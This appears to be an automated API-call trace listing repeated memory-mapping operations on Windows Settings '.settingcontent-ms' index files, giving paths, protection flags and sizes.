Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\aaa_Classic_{241d7c96-f8bf-4f85-b01f-e2b043341a4b}.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\aaa_Classic_{241d7c96-f8bf-4f85-b01f-e2b043341a4b}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1632 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\aaa_Classic_{728047C0-00D2-4FDB-A069-06338B92E93B}.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\aaa_Classic_{728047C0-00D2-4FDB-A069-06338B92E93B}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1792 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\aaa_Classic_{7940ACF8-60BA-4213-A7C3-F3B400EE266D}.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\aaa_Classic_{7940ACF8-60BA-4213-A7C3-F3B400EE266D}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1760 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\aaa_Classic_{A88F43D0-B9C8-42F2-B9F3-90902FC0B22B}.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\aaa_Classic_{A88F43D0-B9C8-42F2-B9F3-90902FC0B22B}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1776 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\aaa_Classic_{E2E2F6CF-9D1A-4004-8999-8AB81010B5AC}.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\aaa_Classic_{E2E2F6CF-9D1A-4004-8999-8AB81010B5AC}.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1840 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_Proxy_Automatic_Config_Group.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_Proxy_Automatic_Config_Group.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1920 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupAppSizesList.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupAppSizesList.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1888 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupAutoplayDefaults.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupAutoplayDefaults.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1920 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupDataSenseMainPageOverview.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupDataSenseMainPageOverview.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1968 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupDataSenseMainPageSettings.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupDataSenseMainPageSettings.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1968 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupEaseOfAccessFilterKeys.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupEaseOfAccessFilterKeys.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1952 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupEaseOfAccessNarrator.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupEaseOfAccessNarrator.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1952 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupEaseOfAccessOSK.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupEaseOfAccessOSK.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1920 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupEaseOfAccessOther.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupEaseOfAccessOther.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1936 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupEaseOfAccessStickyKeys.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupEaseOfAccessStickyKeys.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1952 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupEaseOfAccessToggleKeys.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupEaseOfAccessToggleKeys.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1952 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupFamilyUsers.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupFamilyUsers.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1888 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupInputMouse.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupInputMouse.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1904 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupLockScreenPreview.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupLockScreenPreview.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1936 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupMapsUpdates.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupMapsUpdates.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1888 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupNotificationsAppList.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupNotificationsAppList.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1936 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupOneSyncAccounts.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupOneSyncAccounts.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1920 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupPCSystemDetails.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupPCSystemDetails.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1920 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupPCSystemDeviceEncryption.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupPCSystemDeviceEncryption.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1952 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupPCSystemSupportInfo.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupPCSystemSupportInfo.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1936 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupPCSystemWindowsInfo.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupPCSystemWindowsInfo.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1936 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupPen.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupPen.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1856 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupPersonalizeColorChoose.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupPersonalizeColorChoose.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1936 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupPowerAndSleepDisplayOff.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupPowerAndSleepDisplayOff.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1968 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupPowerAndSleepDisplayOffAoAc.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupPowerAndSleepDisplayOffAoAc.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1984 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupPowerAndSleepSleep.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupPowerAndSleepSleep.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1936 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupPrivacyLocationHistory.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupPrivacyLocationHistory.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1952 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupRegionDateTimeFormats.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupRegionDateTimeFormats.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1952 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupSpeechMicrophone.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupSpeechMicrophone.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1920 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupSpeechTextToSpeech.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupSpeechTextToSpeech.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1920 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupVirtualDesktops.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupVirtualDesktops.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1920 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupYourAccount.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsGroupYourAccount.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1904 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageAccountsManage.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageAccountsManage.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1856 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageAccountsPicture.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageAccountsPicture.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1856 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageAccountsSync.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageAccountsSync.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1840 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageAccountsUsers.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageAccountsUsers.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1840 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageActivate.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageActivate.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1824 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageAppsDefaults.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageAppsDefaults.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1840 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageAppsDefaultsFileExtensionView.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageAppsDefaultsFileExtensionView.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2032 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageAppsDefaultsProtocolView.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageAppsDefaultsProtocolView.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 2016 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageAppsNotifications.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageAppsNotifications.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1872 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageBackground.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageBackground.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1840 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageBatterySaver.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageBatterySaver.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1840 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageColors.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageColors.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1808 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageDataSenseOverview.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageDataSenseOverview.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1872 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageDevicesPen.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageDevicesPen.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1840 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageDevicesPrinters.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageDevicesPrinters.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1856 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageEaseOfAccessClosedCaptioning.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageEaseOfAccessClosedCaptioning.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1920 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageEaseOfAccessHighContrast.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageEaseOfAccessHighContrast.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1904 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageEaseOfAccessKeyboard.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageEaseOfAccessKeyboard.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1888 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageEaseOfAccessMagnifier.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageEaseOfAccessMagnifier.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1888 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageEaseOfAccessMoreOptions.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageEaseOfAccessMoreOptions.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1904 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageEaseOfAccessMouse.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageEaseOfAccessMouse.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1872 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageEaseOfAccessNarrator.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageEaseOfAccessNarrator.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1888 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageLockScreen.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageLockScreen.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1840 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageMaps.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageMaps.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1808 True 1
Fn
Create Mapping C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageMultiTasking.settingcontent-ms filename = C:\Users\FD1HVy\AppData\Local\Packages\windows.immersivecontrolpanel_cw5n1h2txyewy\LocalState\Indexed\Settings\en-US\AAA_SettingsPageMultiTasking.settingcontent-ms, protection = PAGE_READWRITE, maximum_size = 1840 True 1
Fn
